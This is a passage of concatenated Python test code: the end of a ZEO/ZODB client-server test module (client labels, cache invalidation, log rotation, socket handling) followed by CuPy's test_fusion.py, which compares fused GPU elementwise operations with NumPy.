>>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>>> s.connect(addr)
>>> writer = s.makefile(mode='wb')
>>> _ = writer.write(struct.pack(">I", 4)+b"ruok")
>>> writer.close()
>>> proto = s.recv(struct.unpack(">I", s.recv(4))[0])
>>> data = json.loads(
... s.recv(struct.unpack(">I", s.recv(4))[0]).decode("ascii"))
>>> pprint.pprint(data['1'])
{u'aborts': 0,
u'active_txns': 0,
u'commits': 1,
u'conflicts': 0,
u'conflicts_resolved': 0,
u'connections': 1,
u'last-transaction': u'03ac11cd11372499',
u'loads': 1,
u'lock_time': None,
u'start': u'Sun Jan 4 09:37:03 2015',
u'stores': 1,
u'timeout-thread-is-alive': True,
u'waiting': 0}
>>> db.close(); s.close()
"""
def client_labels():
"""
When looking at server logs, for servers with lots of clients coming
from the same machine, it can be very difficult to correlate server
log entries with actual clients. It's possible, sort of, but tedious.
You can make this easier by passing a label to the ClientStorage
constructor.
>>> addr, _ = start_server(log='server.log')
>>> db = ZEO.DB(addr, client_label='test-label-1')
>>> db.close()
>>> @wait_until
... def check_for_test_label_1():
... with open('server.log') as f:
... for line in f:
... if 'test-label-1' in line:
... print(line.split()[1:4])
... return True
['INFO', 'ZEO.StorageServer', '(test-label-1']
You can specify the client label via a configuration file as well:
>>> import ZODB.config
>>> db = ZODB.config.databaseFromString('''
... <zodb>
... <zeoclient>
... server :%s
... client-label test-label-2
... </zeoclient>
... </zodb>
... ''' % addr[1])
>>> db.close()
>>> @wait_until
... def check_for_test_label_2():
... with open('server.log') as f:
... for line in f:
... if 'test-label-2' in line:
... print(line.split()[1:4])
... return True
['INFO', 'ZEO.StorageServer', '(test-label-2']
"""
def invalidate_client_cache_entry_on_server_commit_error():
"""
When the serials returned during commit includes an error, typically a
conflict error, invalidate the cache entry. This is important when
the cache is messed up.
>>> addr, _ = start_server()
>>> conn1 = ZEO.connection(addr)
>>> conn1.root.x = conn1.root().__class__()
>>> transaction.commit()
>>> conn1.root.x
{}
>>> cs = ZEO.ClientStorage.ClientStorage(addr, client='cache')
>>> conn2 = ZODB.connection(cs)
>>> conn2.root.x
{}
>>> conn2.close()
>>> cs.close()
>>> conn1.root.x['x'] = 1
>>> transaction.commit()
>>> conn1.root.x
{'x': 1}
Now, let's screw up the cache by making it have a last tid that is later than
the root serial.
>>> import ZEO.cache
>>> cache = ZEO.cache.ClientCache('cache-1.zec')
>>> cache.setLastTid(p64(u64(conn1.root.x._p_serial)+1))
>>> cache.close()
We'll also update the server so that it's last tid is newer than the cache's:
>>> conn1.root.y = 1
>>> transaction.commit()
>>> conn1.root.y = 2
>>> transaction.commit()
Now, if we reopen the client storage, we'll get the wrong root:
>>> cs = ZEO.ClientStorage.ClientStorage(addr, client='cache')
>>> conn2 = ZODB.connection(cs)
>>> conn2.root.x
{}
And, we'll get a conflict error if we try to modify it:
>>> conn2.root.x['y'] = 1
>>> transaction.commit() # doctest: +ELLIPSIS
Traceback (most recent call last):
...
ConflictError: ...
But, if we abort, we'll get up to date data and we'll see the changes.
>>> transaction.abort()
>>> conn2.root.x
{'x': 1}
>>> conn2.root.x['y'] = 1
>>> transaction.commit()
>>> sorted(conn2.root.x.items())
[('x', 1), ('y', 1)]
>>> conn2.close()
>>> cs.close()
>>> conn1.close()
"""
script_template = """
import sys
sys.path[:] = %(path)r
%(src)s
"""
def generate_script(name, src):
with open(name, 'w') as f:
f.write(script_template % dict(
exe=sys.executable,
path=sys.path,
src=src,
))
def read(filename):
with open(filename) as f:
return f.read()
def runzeo_logrotate_on_sigusr2():
"""
>>> from ZEO.tests.forker import get_port
>>> port = get_port()
>>> with open('c', 'w') as r:
... _ = r.write('''
... <zeo>
... address %s
... </zeo>
... <mappingstorage>
... </mappingstorage>
... <eventlog>
... <logfile>
... path l
... </logfile>
... </eventlog>
... ''' % port)
>>> generate_script('s', '''
... import ZEO.runzeo
... ZEO.runzeo.main()
... ''')
>>> import subprocess, signal
>>> p = subprocess.Popen([sys.executable, 's', '-Cc'], close_fds=True)
>>> wait_until('started',
... lambda : os.path.exists('l') and ('listening on' in read('l'))
... )
>>> oldlog = read('l')
>>> os.rename('l', 'o')
>>> os.kill(p.pid, signal.SIGUSR2)
>>> s = ClientStorage(port)
>>> s.close()
>>> wait_until('See logging', lambda : ('Log files ' in read('l')))
>>> read('o') == oldlog # No new data in old log
True
# Cleanup:
>>> os.kill(p.pid, signal.SIGKILL)
>>> _ = p.wait()
"""
def unix_domain_sockets():
"""Make sure unix domain sockets work
>>> addr, _ = start_server(port='./sock')
>>> c = ZEO.connection(addr)
>>> c.root.x = 1
>>> transaction.commit()
>>> c.close()
"""
def gracefully_handle_abort_while_storing_many_blobs():
r"""
>>> import logging, sys
>>> old_level = logging.getLogger().getEffectiveLevel()
>>> logging.getLogger().setLevel(logging.ERROR)
>>> handler = logging.StreamHandler(sys.stdout)
>>> logging.getLogger().addHandler(handler)
>>> addr, _ = start_server(blob_dir='blobs')
>>> client = ZEO.client(addr, blob_dir='cblobs')
>>> c = ZODB.connection(client)
>>> c.root.x = ZODB.blob.Blob(b'z'*(1<<20))
>>> c.root.y = ZODB.blob.Blob(b'z'*(1<<2))
>>> t = c.transaction_manager.get()
>>> c.tpc_begin(t)
>>> c.commit(t)
We've called commit, but the blob sends are queued. We'll call abort
right away, which will delete the temporary blob files. The queued
iterators will try to open these files.
>>> c.tpc_abort(t)
Now we'll try to use the connection, mainly to wait for everything to
get processed. Before we fixed this by making tpc_finish a synchronous
call to the server. we'd get some sort of error here.
>>> _ = client._call('loadBefore', b'\0'*8, maxtid)
>>> c.close()
>>> logging.getLogger().removeHandler(handler)
>>> logging.getLogger().setLevel(old_level)
"""
def ClientDisconnected_errors_are_TransientErrors():
"""
>>> from ZEO.Exceptions import ClientDisconnected
>>> from transaction.interfaces import TransientError
>>> issubclass(ClientDisconnected, TransientError)
True
"""
if not os.environ.get('ZEO4_SERVER'):
if os.environ.get('ZEO_MSGPACK'):
def test_runzeo_msgpack_support():
"""
>>> import ZEO
>>> a, s = ZEO.server(threaded=False)
>>> conn = ZEO.connection(a)
>>> str(conn.db().storage.protocol_version.decode('ascii'))
'M5'
>>> conn.close(); s()
"""
else:
def test_runzeo_msgpack_support():
"""
>>> import ZEO
>>> a, s = ZEO.server(threaded=False)
>>> conn = ZEO.connection(a)
>>> str(conn.db().storage.protocol_version.decode('ascii'))
'Z5'
>>> conn.close(); s()
>>> a, s = ZEO.server(zeo_conf=dict(msgpack=True), threaded=False)
>>> conn = ZEO.connection(a)
>>> str(conn.db().storage.protocol_version.decode('ascii'))
'M5'
>>> conn.close(); s()
"""
if WIN:
del runzeo_logrotate_on_sigusr2
del unix_domain_sockets
def work_with_multiprocessing_process(name, addr, q):
conn = ZEO.connection(addr)
q.put((name, conn.root.x))
conn.close()
class MultiprocessingTests(unittest.TestCase):
layer = ZODB.tests.util.MininalTestLayer('work_with_multiprocessing')
def test_work_with_multiprocessing(self):
"Client storage should work with multi-processing."
# Gaaa, zope.testing.runner.FakeInputContinueGenerator has no close
if not hasattr(sys.stdin, 'close'):
sys.stdin.close = lambda : None
if not hasattr(sys.stdin, 'fileno'):
sys.stdin.fileno = lambda : -1
self.globs = {}
forker.setUp(self)
addr, adminaddr = self.globs['start_server']()
conn = ZEO.connection(addr)
conn.root.x = 1
transaction.commit()
q = multiprocessing.Queue()
processes = [multiprocessing.Process(
target=work_with_multiprocessing_process,
args=(i, addr, q))
for i in range(3)]
_ = [p.start() for p in processes]
self.assertEqual(sorted(q.get(timeout=300) for p in processes),
[(0, 1), (1, 1), (2, 1)])
_ = [p.join(30) for p in processes]
conn.close()
zope.testing.setupstack.tearDown(self)
@forker.skip_if_testing_client_against_zeo4
def quick_close_doesnt_kill_server():
r"""
Start a server:
>>> from .testssl import server_config, client_ssl
>>> addr, _ = start_server(zeo_conf=server_config)
Now connect and immediately disconnect. This caused the server to
die in the past:
>>> import socket, struct
>>> for i in range(5):
... s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
... s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
... struct.pack('ii', 1, 0))
... s.connect(addr)
... s.close()
>>> print("\n\nXXX WARNING: running quick_close_doesnt_kill_server with ssl as hack pending http://bugs.python.org/issue27386\n", file=sys.stderr) # Intentional long line to be annoying till this is fixed
Now we should be able to connect as normal:
>>> db = ZEO.DB(addr, ssl=client_ssl())
>>> db.storage.is_connected()
True
>>> db.close()
"""
def can_use_empty_string_for_local_host_on_client():
"""We should be able to spell localhost with ''.
>>> (_, port), _ = start_server()
>>> conn = ZEO.connection(('', port))
>>> conn.root()
{}
>>> conn.root.x = 1
>>> transaction.commit()
>>> conn.close()
"""
slow_test_classes = [
BlobAdaptedFileStorageTests, BlobWritableCacheTests,
MappingStorageTests, DemoStorageTests,
FileStorageTests,
FileStorageHexTests, FileStorageClientHexTests,
]
if not forker.ZEO4_SERVER:
slow_test_classes.append(FileStorageSSLTests)
quick_test_classes = [FileStorageRecoveryTests, ZRPCConnectionTests]
class ServerManagingClientStorage(ClientStorage):
def __init__(self, name, blob_dir, shared=False, extrafsoptions=''):
if shared:
server_blob_dir = blob_dir
else:
server_blob_dir = 'server-'+blob_dir
self.globs = {}
addr, stop = forker.start_zeo_server(
"""
<blobstorage>
blob-dir %s
<filestorage>
path %s
%s
</filestorage>
</blobstorage>
""" % (server_blob_dir, name+'.fs', extrafsoptions),
)
zope.testing.setupstack.register(self, stop)
if shared:
ClientStorage.__init__(self, addr, blob_dir=blob_dir,
shared_blob_dir=True)
else:
ClientStorage.__init__(self, addr, blob_dir=blob_dir)
def close(self):
ClientStorage.close(self)
zope.testing.setupstack.tearDown(self)
def create_storage_shared(name, blob_dir):
return ServerManagingClientStorage(name, blob_dir, True)
class ServerManagingClientStorageForIExternalGCTest(
ServerManagingClientStorage):
def pack(self, t=None, referencesf=None):
ServerManagingClientStorage.pack(self, t, referencesf, wait=True)
# Packing doesn't clear old versions out of zeo client caches,
# so we'll clear the caches.
self._cache.clear()
ZEO.ClientStorage._check_blob_cache_size(self.blob_dir, 0)
def test_suite():
suite = unittest.TestSuite((
unittest.makeSuite(Test_convenience_functions),
))
zeo = unittest.TestSuite()
zeo.addTest(unittest.makeSuite(ZODB.tests.util.AAAA_Test_Runner_Hack))
patterns = [
(re.compile(r"u?'start': u?'[^\n]+'"), 'start'),
(re.compile(r"u?'last-transaction': u?'[0-9a-f]+'"),
'last-transaction'),
(re.compile("ZODB.POSException.ConflictError"), "ConflictError"),
(re.compile("ZODB.POSException.POSKeyError"), "POSKeyError"),
(re.compile("ZEO.Exceptions.ClientStorageError"), "ClientStorageError"),
(re.compile(r"\[Errno \d+\]"), '[Errno N]'),
(re.compile(r"loads=\d+\.\d+"), 'loads=42.42'),
# Python 3 drops the u prefix
(re.compile("u('.*?')"), r"\1"),
(re.compile('u(".*?")'), r"\1")
]
if not PY3:
patterns.append((re.compile("^'(blob[^']*)'"), r"b'\1'"))
patterns.append((re.compile("^'Z308'"), "b'Z308'"))
zeo.addTest(doctest.DocTestSuite(
setUp=forker.setUp, tearDown=zope.testing.setupstack.tearDown,
checker=renormalizing.RENormalizing(patterns),
))
zeo.addTest(doctest.DocTestSuite(
ZEO.tests.IterationTests,
setUp=forker.setUp, tearDown=zope.testing.setupstack.tearDown,
checker=renormalizing.RENormalizing((
(re.compile("ZEO.Exceptions.ClientDisconnected"),
"ClientDisconnected"),
)),
))
if not forker.ZEO4_SERVER:
# ZEO 4 doesn't support client-side conflict resolution
zeo.addTest(unittest.makeSuite(ClientConflictResolutionTests, 'check'))
zeo.layer = ZODB.tests.util.MininalTestLayer('testZeo-misc')
suite.addTest(zeo)
zeo = unittest.TestSuite()
zeo.addTest(
doctest.DocFileSuite(
'zdoptions.test',
'drop_cache_rather_than_verify.txt', 'client-config.test',
'protocols.test', 'zeo_blob_cache.test', 'invalidation-age.txt',
'../nagios.rst',
setUp=forker.setUp, tearDown=zope.testing.setupstack.tearDown,
checker=renormalizing.RENormalizing(patterns),
globs={'print_function': print_function},
),
)
zeo.addTest(PackableStorage.IExternalGC_suite(
lambda :
ServerManagingClientStorageForIExternalGCTest(
'data.fs', 'blobs', extrafsoptions='pack-gc false')
))
for klass in quick_test_classes:
zeo.addTest(unittest.makeSuite(klass, "check"))
zeo.layer = ZODB.tests.util.MininalTestLayer('testZeo-misc2')
suite.addTest(zeo)
# tests that often fail, maybe if they have their own layers
for name in 'zeo-fan-out.test', 'new_addr.test':
zeo = unittest.TestSuite()
zeo.addTest(
doctest.DocFileSuite(
name,
setUp=forker.setUp, tearDown=zope.testing.setupstack.tearDown,
checker=renormalizing.RENormalizing(patterns),
globs={'print_function': print_function},
),
)
zeo.layer = ZODB.tests.util.MininalTestLayer('testZeo-' + name)
suite.addTest(zeo)
suite.addTest(unittest.makeSuite(MultiprocessingTests))
# Put the heavyweights in their own layers
for klass in slow_test_classes:
sub = unittest.makeSuite(klass, "check")
sub.layer = ZODB.tests.util.MininalTestLayer(klass.__name__)
suite.addTest(sub)
suite.addTest(ZODB.tests.testblob.storage_reusable_suite(
'ClientStorageNonSharedBlobs', ServerManagingClientStorage))
suite.addTest(ZODB.tests.testblob.storage_reusable_suite(
'ClientStorageSharedBlobs', create_storage_shared))
if not forker.ZEO4_SERVER:
from .threaded import threaded_server_tests
dynamic_server_ports_suite = doctest.DocFileSuite(
'dynamic_server_ports.test',
setUp=forker.setUp, tearDown=zope.testing.setupstack.tearDown,
checker=renormalizing.RENormalizing(patterns),
globs={'print_function': print_function},
)
dynamic_server_ports_suite.layer = threaded_server_tests
suite.addTest(dynamic_server_ports_suite)
return suite
if __name__ == "__main__":
unittest.main(defaultTest="test_suite")
|
test_fusion.py
|
import mock
import numpy
import six
import threading
import unittest
import cupy
from cupy import testing
def fusion_default_array_equal():
def deco(func):
def wrapper(self_x, name, xp, **dtypes):
@cupy.fuse()
def f(*args):
return getattr(xp, name)(*args)
args = func(self_x, name, xp, **dtypes)
return f(*args)
return wrapper
return deco
@testing.gpu
class TestFusionElementwise(unittest.TestCase):
@testing.for_int_dtypes()
@testing.numpy_cupy_array_equal()
@fusion_default_array_equal()
def check_unary_int(self, name, xp, dtype):
a = xp.array([-3, -2, -1, 0, 1, 2, 3], dtype=dtype)
return (a,)
@testing.for_int_dtypes()
@testing.numpy_cupy_array_equal()
@fusion_default_array_equal()
def check_binary_int(self, name, xp, dtype):
a = xp.array([-3, -2, -1, 0, 1, 2, 3], dtype=dtype)
b = xp.array([0, 1, 2, 3, 4, 5, 6], dtype=dtype)
return a, b
def test_bitwise_and(self):
self.check_binary_int('bitwise_and')
def test_bitwise_or(self):
self.check_binary_int('bitwise_or')
def test_bitwise_xor(self):
self.check_binary_int('bitwise_xor')
def test_invert(self):
self.check_unary_int('invert')
def test_left_shift(self):
self.check_binary_int('left_shift')
def test_right_shift(self):
self.check_binary_int('right_shift')
@testing.gpu
class TestFusionComparison(unittest.TestCase):
@testing.for_all_dtypes_combination(
no_complex=True, names=['dtype1', 'dtype2'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary(self, name, xp, dtype1, dtype2):
a = testing.shaped_arange((2, 3), xp, dtype1)
b = testing.shaped_reverse_arange((2, 3), xp, dtype2)
return a, b
def test_greater(self):
self.check_binary('greater')
def test_greater_equal(self):
self.check_binary('greater_equal')
def test_less(self):
self.check_binary('less')
def test_less_equal(self):
self.check_binary('less_equal')
def test_not_equal(self):
self.check_binary('not_equal')
def test_equal(self):
self.check_binary('equal')
@testing.gpu
class TestFusionContent(unittest.TestCase):
@testing.for_float_dtypes()
@testing.numpy_cupy_array_equal()
@fusion_default_array_equal()
def check_unary_inf(self, name, xp, dtype):
a = xp.array([-3, dtype('inf'), -1, -dtype('inf'), 0, 1, 2],
dtype=dtype)
return (a,)
@testing.for_float_dtypes()
@testing.numpy_cupy_array_equal()
@fusion_default_array_equal()
def check_unary_nan(self, name, xp, dtype):
a = xp.array(
[-3, numpy.NAN, -1, numpy.NAN, 0, numpy.NAN, dtype('inf')],
dtype=dtype)
return (a,)
def test_isfinite(self):
self.check_unary_inf('isfinite')
def test_isinf(self):
self.check_unary_inf('isinf')
def test_isnan(self):
self.check_unary_nan('isnan')
@testing.gpu
class TestFusionOps(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary(self, name, xp, dtype):
a = testing.shaped_arange((2, 3), xp, dtype)
return (a,)
@testing.for_all_dtypes_combination(
no_complex=True, names=['dtype1', 'dtype2'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary(self, name, xp, dtype1, dtype2):
a = testing.shaped_arange((2, 3), xp, dtype1)
b = testing.shaped_reverse_arange((2, 3), xp, dtype2)
return a, b
def test_logical_and(self):
self.check_binary('logical_and')
def test_logical_or(self):
self.check_binary('logical_or')
def test_logical_xor(self):
self.check_binary('logical_xor')
def test_logical_not(self):
self.check_unary('logical_not')
@testing.gpu
class TestFusionTrigonometric(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary(self, name, xp, dtype):
a = testing.shaped_arange((2, 3), xp, dtype)
return (a,)
@testing.for_all_dtypes_combination(
no_complex=True, names=['dtype1', 'dtype2'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary(self, name, xp, dtype1, dtype2):
a = testing.shaped_arange((2, 3), xp, dtype1)
b = testing.shaped_reverse_arange((2, 3), xp, dtype2)
return a, b
@testing.for_dtypes(['e', 'f', 'd'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary_unit(self, name, xp, dtype):
a = xp.array([0.2, 0.4, 0.6, 0.8], dtype=dtype)
return (a,)
def test_sin(self):
self.check_unary('sin')
def test_cos(self):
self.check_unary('cos')
def test_tan(self):
self.check_unary('tan')
def test_arcsin(self):
self.check_unary_unit('arcsin')
def test_arccos(self):
self.check_unary_unit('arccos')
def test_arctan(self):
self.check_unary('arctan')
def test_arctan2(self):
self.check_binary('arctan2')
def test_hypot(self):
self.check_binary('hypot')
def test_deg2rad(self):
self.check_unary('deg2rad')
def test_rad2deg(self):
self.check_unary('rad2deg')
@testing.gpu
class TestFusionHyperbolic(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary(self, name, xp, dtype):
a = testing.shaped_arange((2, 3), xp, dtype)
return (a,)
@testing.for_dtypes(['e', 'f', 'd'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary_unit1(self, name, xp, dtype):
a = xp.array([1, 2, 3], dtype=dtype)
return (a,)
@testing.for_dtypes(['e', 'f', 'd'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary_unit2(self, name, xp, dtype):
a = xp.array([0.2, 0.4, 0.6, 0.8], dtype=dtype)
return (a,)
def test_sinh(self):
self.check_unary('sinh')
def test_cosh(self):
self.check_unary('cosh')
def test_tanh(self):
self.check_unary('tanh')
def test_arcsinh(self):
self.check_unary('arcsinh')
def test_arccosh(self):
self.check_unary_unit1('arccosh')
def test_arctanh(self):
self.check_unary_unit2('arctanh')
@testing.gpu
class TestFusionRounding(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary(self, name, xp, dtype):
a = testing.shaped_arange((2, 3), xp, dtype)
return (a,)
@testing.for_dtypes(['?', 'b', 'h', 'i', 'q', 'e', 'f', 'd'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary_negative(self, name, xp, dtype):
a = xp.array([-3, -2, -1, 1, 2, 3], dtype=dtype)
return (a,)
def test_rint(self):
self.check_unary('rint')
def test_rint_negative(self):
self.check_unary_negative('rint')
def test_floor(self):
self.check_unary('floor')
def test_ceil(self):
self.check_unary('ceil')
def test_trunc(self):
self.check_unary('trunc')
def test_fix(self):
self.check_unary('fix')
@testing.gpu
class TestFusionExplog(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary(self, name, xp, dtype):
a = testing.shaped_arange((2, 3), xp, dtype)
return (a,)
@testing.for_all_dtypes_combination(
no_complex=True, names=['dtype1', 'dtype2'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary(self, name, xp, dtype1, dtype2):
a = testing.shaped_arange((2, 3), xp, dtype1)
b = testing.shaped_reverse_arange((2, 3), xp, dtype2)
return a, b
def test_exp(self):
self.check_unary('exp')
def test_expm1(self):
self.check_unary('expm1')
def test_exp2(self):
self.check_unary('exp2')
def test_log(self):
with testing.NumpyError(divide='ignore'):
self.check_unary('log')
def test_log10(self):
with testing.NumpyError(divide='ignore'):
self.check_unary('log10')
def test_log2(self):
with testing.NumpyError(divide='ignore'):
self.check_unary('log2')
def test_log1p(self):
self.check_unary('log1p')
def test_logaddexp(self):
self.check_binary('logaddexp')
def test_logaddexp2(self):
self.check_binary('logaddexp2')
@testing.gpu
class TestFusionFloating(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary(self, name, xp, dtype):
a = testing.shaped_arange((2, 3), xp, dtype)
return (a,)
@testing.for_all_dtypes_combination(
no_complex=True, names=['dtype1', 'dtype2'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary(self, name, xp, dtype1, dtype2):
a = testing.shaped_arange((2, 3), xp, dtype1)
b = testing.shaped_reverse_arange((2, 3), xp, dtype2)
return a, b
@testing.for_float_dtypes(name='ftype')
@testing.for_dtypes(['i', 'l'], name='itype')
@testing.numpy_cupy_allclose()
def test_ldexp(self, xp, ftype, itype):
a = xp.array([-3, -2, -1, 0, 1, 2, 3], dtype=ftype)
b = xp.array([-3, -2, -1, 0, 1, 2, 3], dtype=itype)
@cupy.fuse()
def g(x, y):
return xp.ldexp(x, y)
return g(a, b)
def test_signbit(self):
self.check_unary('signbit')
def test_copysign(self):
self.check_binary('copysign')
@testing.for_float_dtypes()
def test_frexp(self, dtype):
numpy_a = numpy.array([-300, -20, -10, -1, 0, 1, 10, 20, 300],
dtype=dtype)
@cupy.fuse()
def g(x):
xp = cupy.get_array_module(x)
return xp.frexp(x)
numpy_b, numpy_c = g(numpy_a)
cupy_a = cupy.array(numpy_a)
cupy_b, cupy_c = g(cupy_a)
testing.assert_allclose(cupy_b, numpy_b)
testing.assert_array_equal(cupy_c, numpy_c)
def test_nextafter(self):
self.check_binary('nextafter')
@testing.gpu
class TestFusionArithmetic(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary(self, name, xp, dtype):
a = testing.shaped_arange((2, 3), xp, dtype)
return (a,)
@testing.for_all_dtypes_combination(names=['dtype1', 'dtype2'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary(self, name, xp, dtype1, dtype2):
a = testing.shaped_arange((2, 3), xp, dtype1)
b = testing.shaped_reverse_arange((2, 3), xp, dtype2)
return a, b
@testing.for_all_dtypes_combination(
no_bool=True, no_complex=True, names=['dtype1', 'dtype2'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary_without_complex_bool(self, name, xp, dtype1, dtype2):
a = testing.shaped_arange((2, 3), xp, dtype1)
b = testing.shaped_reverse_arange((2, 3), xp, dtype2)
return a, b
@testing.for_all_dtypes_combination(
no_bool=True, names=['dtype1', 'dtype2'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary_without_bool(self, name, xp, dtype1, dtype2):
a = testing.shaped_arange((2, 3), xp, dtype1)
b = testing.shaped_reverse_arange((2, 3), xp, dtype2)
return a, b
@testing.for_dtypes(['?', 'b', 'h', 'i', 'q', 'e', 'f', 'd'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_unary_negative(self, name, xp, dtype):
a = xp.array([-3, -2, -1, 1, 2, 3], dtype=dtype)
return (a,)
@testing.for_dtypes_combination(
['?', 'b', 'h', 'i', 'q', 'e', 'f', 'd'], names=['dtype1', 'dtype2'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary_negative(self, name, xp, dtype1, dtype2):
a = xp.array([-3, -2, -1, 1, 2, 3], dtype=dtype1)
b = xp.array([4, 3, 2, 1, -1, -2], dtype=dtype2)
return a, b
@testing.for_dtypes_combination(
['e', 'f', 'd'], names=['dtype1', 'dtype2'])
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary_negative_float(self, name, xp, dtype1, dtype2):
a = xp.array([-3, -2, -1, 1, 2, 3], dtype=dtype1)
b = xp.array([4, 3, 2, 1, -1, -2], dtype=dtype2)
return a, b
def test_add(self):
self.check_binary('add')
def test_reciprocal(self):
with testing.NumpyError(divide='ignore', invalid='ignore'):
self.check_unary('reciprocal')
def test_multiply(self):
self.check_binary('multiply')
def test_divide(self):
with testing.NumpyError(divide='ignore'):
self.check_binary_without_bool('divide')
def test_divide_negative(self):
with testing.NumpyError(divide='ignore'):
self.check_binary_negative('divide')
def test_power_negative(self):
self.check_binary_negative_float('power')
def test_subtract(self):
# TODO(unno): boolean subtract causes DeprecationWarning in numpy>=1.13
self.check_binary_without_bool('subtract')
def test_true_divide(self):
with testing.NumpyError(divide='ignore'):
self.check_binary_without_bool('true_divide')
def test_true_divide_negative(self):
with testing.NumpyError(divide='ignore'):
self.check_binary_negative('true_divide')
def test_floor_divide(self):
with testing.NumpyError(divide='ignore'):
self.check_binary_without_complex_bool('floor_divide')
def test_floor_divide_negative(self):
with testing.NumpyError(divide='ignore'):
self.check_binary_negative('floor_divide')
def test_fmod(self):
with testing.NumpyError(divide='ignore'):
self.check_binary_without_complex_bool('fmod')
def test_fmod_negative(self):
with testing.NumpyError(divide='ignore'):
self.check_binary_negative('fmod')
@testing.for_float_dtypes()
@testing.numpy_cupy_allclose()
def test_modf(self, xp, dtype):
a = xp.array([-2.5, -1.5, -0.5, 0, 0.5, 1.5, 2.5], dtype=dtype)
@cupy.fuse()
def g(x):
return xp.modf(x)
b, c = g(a)
d = xp.empty((2, 7), dtype=dtype)
d[0] = b
d[1] = c
return d
def test_remainder(self):
with testing.NumpyError(divide='ignore'):
self.check_binary_without_complex_bool('remainder')
def test_remainder_negative(self):
with testing.NumpyError(divide='ignore'):
self.check_binary_negative('remainder')
@testing.gpu
class TestFusionArithmeticLargeTolerance(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(atol=1e-5)
@fusion_default_array_equal()
def check_binary_no_complex(self, name, xp, dtype):
a = testing.shaped_arange((2, 3), xp, dtype) + 1
b = testing.shaped_reverse_arange((2, 3), xp, dtype) + 1
return a, b
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(atol=1e-3)
@fusion_default_array_equal()
def check_binary_complex(self, name, xp, dtype):
a = testing.shaped_arange((2, 3), xp, dtype) + 1
b = testing.shaped_reverse_arange((2, 3), xp, dtype) + 1
return a, b
def test_power(self):
self.check_binary_no_complex('power')
self.check_binary_complex('power')
class TestFusionUfunc(unittest.TestCase):
@cupy.fuse()
def sample_function(x, y, z):
xp = cupy.get_array_module(x, y, z)
return xp.square(xp.add(x, y))
def random_bool(self, seed=0):
return testing.shaped_random((3, 3),
xp=cupy,
dtype=numpy.bool_,
seed=seed)
def random_int(self, lower=-1000, higher=1000, seed=0):
return testing.shaped_random((3, 3),
xp=cupy,
dtype=numpy.int64,
scale=(higher - lower),
seed=seed) + lower
def random_real(self, lower=-1000, higher=1000, seed=0):
return testing.shaped_random((3, 3),
xp=cupy,
dtype=numpy.float64,
scale=(higher - lower),
seed=seed) + lower
def random_imag(self, lower=-1000, higher=1000, seed=0):
return testing.shaped_random((3, 3),
xp=cupy,
dtype=numpy.complex128,
scale=(higher - lower),
seed=seed) + lower
def check(self, func, n, gen, args=None):
if args is None:
args = ((),) * n
self._check(func, n, gen, args)
def _check(self, func, n, gen, args, error_types=None):
assert n == len(args), (n, args)
if error_types is None:
error_types = ()
f = cupy.fuse(func)
# Prepare input arrays
if not isinstance(gen, tuple):
gen = (gen,) * n
data0 = tuple([g(*a) for g, a in zip(gen, args)])
data1 = tuple([_.copy() for _ in data0])
# Invoke non-fused function
try:
ret0 = func(*data0) # Non-fused
err0 = None
except Exception as e:
if type(e) not in error_types:
raise
ret0 = None
err0 = e
# Invoke fused function
try:
ret1 = f(*data1) # Fused
err1 = None
except Exception as e:
if type(e) not in error_types:
raise
ret1 = None
err1 = e
self.assertEqual(err0 is None, err1 is None)
if err0 is not None:
# Error
self.assertEqual(type(err0), type(err1))
self.assertEqual(str(err0), str(err1))
arrs0 = None
arrs1 = None
else:
# Success
self.assertEqual(ret0 is None, ret1 is None)
if ret0 is None:
# Both return values are None
ret0 = ()
ret1 = ()
else:
# Return values must have the same type
self.assertEqual(type(ret0), type(ret1))
if not isinstance(ret0, tuple):
# Single arrays are returned
ret0 = (ret0,)
ret1 = (ret1,)
else:
# Tuples are returned
self.assertEqual(len(ret0), len(ret1))
# Concatenate return values and input arrays
arrs0 = ret0 + data0
arrs1 = ret1 + data1
# Test they have same values
for nf, f in zip(arrs0, arrs1):
numpy.testing.assert_array_almost_equal(nf.get(), f.get())
